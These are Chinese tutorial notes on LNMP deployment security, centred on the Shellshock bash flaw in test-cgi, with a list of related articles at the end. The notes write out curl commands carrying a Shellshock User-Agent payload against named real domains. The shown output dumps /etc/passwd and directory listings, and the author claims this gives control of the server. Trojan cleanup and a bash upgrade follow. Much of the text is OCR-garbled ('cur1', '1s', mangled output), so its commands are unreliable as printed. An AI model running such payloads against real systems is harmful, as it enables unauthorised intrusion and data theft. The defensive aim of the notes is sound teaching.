LNMP架构的部署注意事项

简介: 一、漏洞的威胁二、案例

LNMP架构的部署注意事项

 

 

内容介绍

一、漏洞的威胁

二、案例

 

 

一、漏洞的威胁

百度搜test-cgi 漏洞 乌云

test-cgi漏洞 ,例如:
第一个:bash破壳命令执行
curl-A"(){foo;};echo;/bin/cat/etc/passwd"http://mail.10jqka.com.cn:88/cgi-bin/test-cgi

运行

[root@localhost extraj# cur1 -A "( { foo; };echo;/bin/cat /etc/passwd”http : / /www . eduedu .com/cgi-bin/test-cgi

root: :o:o:root: /root: /bin/bash

bin: x:1:1:bin: /bin: / sbin/nologin

daemon : x:2: 2:daemon: /sbin:/sbin/nologinadm: x:3:4: adm:/var/adm:/sbin/no1ooi

daemon : x:2: 2:daemon: /sbin:/sbin/nologinadm: x:3:4: adm:/var/adm:/sbin/no1ogin

lp : x:4:7: lp: /var/ spoo1/1pd: jsbin/hologinsync:x:5:o: sync:/sbin:/bin/halt

mail:x:8:12:mail:/var /spoo1/mai1:/sbin/nologinuucp :x:10:14:uucp :/var/ spoo1/uucp: / sbin/nologin

operator:x:11:0:operator:/root:/sbin/no1ogin

games:x:12:100: games :/usr/games: /sbin/no1ogin

gopher: x:13:30: gopher: /var7gopher: /sbin/no1ogin

ftp :x:14:50:FTPUser :/var/ftp:/sbin/nologin

nobody : x:99:99: Nobody :/ :/ sbin/nologin

vcsa:x:69:69:.rtuaconoheeer"/var7empty/sasiauth:/sbin/no1og

postfix:x:89:89: : /var/spoo1/postfix:/sbin/no1ogin

sshd:x:74:74:Privilege-separated ssH:/var/empty/sshd:/sbin/nologinmysq1:x:600:600: :/home /mysql:/bin/bash

[root@7ocalhost extra1#

在本机输入该命令就可以获取远程服务器的所有密码信息,包括目录信息·

[root@locaThost extra]# cur1 '-A "( { foo;};echo;/bin/1s/" http//www.eduedu.com/cgi-bin/test-cgi

vMwareroois-8.6.5-621624 .tar. gz

bin

boot

cicro

crossdomain.xml

dev

etc

home

index.html

index.html.1

lib

lib64

lost+found

media

mnt

opt

proc

root

查看其他目录内容

[root@locaThost extra]# cur1 '-A "( { foo;};echo;/bin/1s/boot" http//www.eduedu.com/cgi-bin/test-cgi

就可以登录账号,修改密码等任何事情,通过这个漏洞就能控制远程服务器。

 

分析漏洞产生原因:bash本身存在漏洞

漏洞证明:shell,很多函数和$不让使用,如果shellsql结合会使所有的信息清楚展现

 

漏洞诞生的原因:需要的模块加载,不需要的不必加载。必须要在有漏洞、必须要有cgi是可执行的

[root@i-465-39832-VMconf]#_cd ../

[root@i-465-39832-VMapache]#ls

binbuild cgi-bin conferrorhtdocsiconsincludelogsmanmanua1 modules

[root@i-465-39832-VMapache]# cd cgi-bin/

[root@i-465-39832-VMcgi-bin]#1s

printenvtest-cgi

[root@i-465-39832-vMcgi-bin]#ps-ef查看结果

 image.png

 

查看执行路径:

[root@i-465-39832-YM cgi-bin]# 11_/proc/32207/exe.-

irwxrwxrwx. 1 mysq1 mysq1 0 Mar3' i9:37/proc/32207/exe ->/cicrodb_temp /yufeng--.

[root@i-465-39832-vM cgi-bin]# cd //cicro/wcm/data/db/mysq1/data

[root@i-465-39832-VMdata]#1s

 

打开后都是木马文件

image.png

 

删除:

[root@i-465-39832-vM data]#rm_-rf keeplive_

[root@i-465-39832-VM data]# rm-rf keep1ive*

lroot@i-465-39832-VMdata]#1f

kill

[root@i-465-39832-VM data]#killa11 -9 yufeng

一个一个kill,若关不掉就控制路径

[root@i-465-39832-VM data]# cd /cicro/wcm/as/

[root@i-465-39832-VMas]#1s..oapacheapache_2.4jdk1.7.0_67tomcat

apache.2.2.3_jdk1.6.0_13nginx      tomcat_20141029

[root@i-465-39832-VMas]#cd apache

[root@i-465-39832-VMapache]#ls

binbuildcgi-binconferrorhtdocs, iconsincludelogs

[root@i-465-39832-VMapache]# cd cgi-bin/

[root@i-465-39832-VMcgi-bin]#ls

printenv.test-cgi

[root@i-465-39832-VM cgi-bin]# rm -rf test-cgi

[root@i-465-39832-VMcgi-bin]#ls

Printenv

[root@i-465-39832-VMcgi-bin]#77total4

-rwxr-xr-x.1root. root.294.pec 11 2oo4iprantenv

[root@i-465-39832-VM cgi-bin]# rm-rf printenv

[root@i-465-39832-VMcgi-bin]#ls

[root@i-465-39832-VMcgi-bin]#1s -al

Total 8

Drwxr-xr-x. 2 root root 4096 mar 322:46

Drwxr-xr-x. 14 root root 4096 dec 5 2014

[root@i-465-39832-VMcgi-bin]#ps

 

杀掉之后,杜绝根源,因为besh有漏洞,所以解决措施是升级besh

 

注意:文件需要删除干净

ll/ID通过内存后查看(绿色显示的是:真实的文件放置的位置)

发现木马文件:删除原文件不可以删库、还可从入口控制(删除入口)

删除掉木马文件可以从:运行速度、运行负载看到

保证原服务器正常的情况下升级

 

二、例题

CGI/1.0 test seript report:⬇
anc is 0. argv is.

SERVER_SOFTWARE=Apache/2.2.29 (Unix) DAV/2 mod_jk/1.2.

SERVER NAE = www. eduedu com

GATEVAY INTERFACE = CGI/1.1

SERVER PROTOCOL = HTTP/1.1

SERVER FORt = 80

REQUEST_ METHD = GET

HTIP. ACCEPT =text/html,application/xhtml+xml,app

PATH_TRANSATED =
SCRIPI_NAME = /cgi-bin/test-cgi

QUERY_SIRING =

RETOTE_HDST =

REIOTE_ADDR = 117.34.5.240

REIOTE_USER=

AUIH_TYPE =

CONTENT_TYPE =

CONIENT_LENGTH =

相关文章
|
6月前
|
存储 Kubernetes Cloud Native
【云原生】k8s组件&架构介绍与K8s最新版部署
【云原生】k8s组件&架构介绍与K8s最新版部署
173 0
|
7月前
|
关系型数据库 MySQL 应用服务中间件
手动部署LNMP环境(Alibaba Cloud Linux 2)
本场景带您体验如何在Alibaba Cloud Linux 2.1903 LTS 64位操作系统的云服务器上搭建LNMP环境。
199 0
|
5月前
|
存储 Linux Docker
跨cpu架构部署容器技术点:怎样修改Linux 的内核版本
在使用Docker 进行跨平台部署之后,我们还可以尝试进行跨架构部署。 从X86 架构上移植到 aarch64 上。
199 0
|
1月前
|
Kubernetes 测试技术 持续交付
探索微服务架构下的持续集成与部署最佳实践
本文将深入探讨在微服务架构下实施持续集成与部署的最佳实践,介绍如何利用现代化工具和流程来实现自动化测试、持续集成、灰度发布等关键环节,帮助开发团队提升交付效率和质量。
|
2月前
|
KVM 虚拟化 Android开发
DP读书:鲲鹏处理器 架构与编程(十二)鲲鹏软件实战案例Docker+KVM的部署
DP读书:鲲鹏处理器 架构与编程(十二)鲲鹏软件实战案例Docker+KVM的部署
52 1
|
2月前
|
云计算 开发者 Docker
深入浅出:使用Docker部署微服务架构
在当今快速迭代的软件开发环境中,微服务架构凭借其灵活性和可扩展性成为了热门趋势。本文将探讨如何利用Docker这一强大的容器化技术,简化和加速微服务应用的部署与管理过程。我们将从微服务的基本概念出发,逐步深入到Docker的核心功能,最后通过一个实际案例演示整个部署流程。文章旨在为开发者提供一个清晰、实用的指南,帮助他们有效地利用Docker在微服务架构下的应用部署。
26 0
|
4月前
|
消息中间件 持续交付 Docker
Docker与微服务:构建和部署微服务架构的完整指南
微服务架构已经成为现代应用开发的主要范式之一,而Docker容器技术则为微服务的构建、部署和管理提供了理想的解决方案。本文将深入探讨如何使用Docker构建和部署微服务架构,提供更多示例代码和细致的指南,以帮助大家更全面地理解和运用这些关键概念。
|
4月前
|
关系型数据库 MySQL 应用服务中间件
小白带你部署LNMP分布式部署
小白带你部署LNMP分布式部署
69 0
|
4月前
|
JSON 运维 监控
云端部署:使用AWS Lambda与公司流量监控软件实现无服务器架构
在当今数字化时代,跨平台移动应用的开发已经成为企业推广业务的一项关键工作。为了更好地监控和分析应用程序的性能,公司流量监控软件的整合变得至关重要。本文将介绍如何使用AWS Lambda和公司流量监控软件,构建一个高效的无服务器架构,实现对跨平台移动应用的流量监控。
233 0
|
4月前
|
存储 Kubernetes 对象存储
Kubernetes存储:Ceph架构,部署和使用
Kubernetes存储:Ceph架构,部署和使用
75 0